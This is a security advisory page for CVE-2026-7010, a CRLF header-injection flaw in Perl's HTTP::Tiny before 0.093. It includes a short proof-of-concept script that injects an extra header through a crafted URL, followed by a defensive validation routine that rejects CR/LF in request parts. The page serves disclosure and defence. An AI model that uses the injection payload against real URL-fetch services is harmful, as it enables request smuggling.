Security Vulnerability Report
CVE-2026-7010 CVSS 6.5 MEDIUM


Published: 2026-05-11 22:22:15
Last Modified: 2026-05-12 16:48:58
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

HTTP::Tiny versions before 0.093 for Perl do not validate CRLF in HTTP request lines or control field header values. The unvalidated inputs are the method and URI in the request line, the URL host that becomes the `Host:` header, and HTTP/1.1 control data field values. An attacker who controls one of these inputs, for example a user-supplied URL passed to a webhook or URL-fetch endpoint, can inject additional headers and smuggle requests to the upstream server.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HTTP::Tiny < 0.093

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Perl
use strict;
use warnings;
use HTTP::Tiny;

# Create a new HTTP::Tiny instance (vulnerable version < 0.093)
my $ua = HTTP::Tiny->new();

# Malicious URL containing CRLF characters to inject headers.
# Double quotes are needed so that \r\n interpolate to real CR/LF bytes;
# inside single quotes Perl would send the literal characters backslash-r, backslash-n.
my $malicious_url = "http://example.com/api\r\nX-Injected-Header: pwned\r\n";

print "Sending request to: $malicious_url\n";

# The vulnerable library copies the CR/LF bytes into the request unchanged,
# so the injected line appears in the raw request, roughly:
# GET /api HTTP/1.1
# Host: example.com
# X-Injected-Header: pwned
# ...
my $response = $ua->get($malicious_url);

if ($response->{success}) {
    print "Request sent.\n";
} else {
    print "Request failed: " . $response->{status} . " " . $response->{reason} . "\n";
}
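The advisory names three unvalidated inputs (method, URL/host, header values). The following is an added example, not code from the advisory or from HTTP::Tiny itself, showing how a caller can refuse CR/LF in those inputs before the request is built; `request_part_problems` and `safe_request` are hypothetical names, and rejecting any CR or LF byte is an assumption about a sufficient client-side guard, not a description of the 0.093 fix.

```perl
#!/usr/bin/env perl
# Added example, not code from the advisory or from HTTP::Tiny itself.
use strict;
use warnings;
use HTTP::Tiny;

# Return a list of problems (empty if none) for the request components the
# advisory names: the method, the URL (whose host becomes the Host: header)
# and every header name and value. Rejecting any CR or LF byte is a simple,
# conservative guard (an assumption here, not the 0.093 fix itself).
sub request_part_problems {
    my ($method, $url, $headers) = @_;
    $headers ||= {};
    my @problems;
    for my $pair (['method', $method], ['url', $url]) {
        my ($name, $value) = @$pair;
        if (!defined $value) { push @problems, "$name is undefined"; next; }
        push @problems, "$name contains CR/LF" if $value =~ /[\r\n]/;
    }
    for my $name (sort keys %$headers) {
        push @problems, "header name '$name' contains CR/LF" if $name =~ /[\r\n]/;
        # HTTP::Tiny accepts a scalar or an array ref of values per header
        my @values = ref($headers->{$name}) eq 'ARRAY' ? @{ $headers->{$name} } : ($headers->{$name});
        push @problems, "header '$name' value contains CR/LF"
            for grep { defined($_) && $_ =~ /[\r\n]/ } @values;
    }
    return @problems;
}

# Hypothetical wrapper: refuse the request instead of handing tainted parts to
# HTTP::Tiny. Upgrading to 0.093 is the fix; this is defence in depth on top of it.
sub safe_request {
    my ($ua, $method, $url, $opts) = @_;
    $opts ||= {};
    my @problems = request_part_problems($method, $url, $opts->{headers});
    die "refusing request: " . join('; ', @problems) . "\n" if @problems;
    return $ua->request($method, $url, $opts);
}

# Offline check on constructed inputs; no request is sent for the tainted URL.
my $tainted = "http://example.com/api\r\nX-Injected-Header: pwned\r\n";
my @bad  = request_part_problems('GET', $tainted, { 'X-Real' => ['ok', "evil\r\n"] });
my @good = request_part_problems('GET', 'http://example.com/api', { 'X-Real' => 'ok' });
print "tainted: ", join('; ', @bad), "\n";          # url and one header value reported
print "clean:   ", (@good ? "rejected" : "accepted"), "\n";
my $ua = HTTP::Tiny->new;
eval { safe_request($ua, 'GET', $tainted) };
print "safe_request: $@" if $@;
```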

Weakness

CWE-113

References

https://github.com/Perl-Toolchain-Gang/HTTP-Tiny/commit/d73c7651e82ace02693842df55928b6c3ae7c38d.patch
https://metacpan.org/release/HAARG/HTTP-Tiny-0.093-TRIAL/changes
http://www.openwall.com/lists/oss-security/2026/05/11/17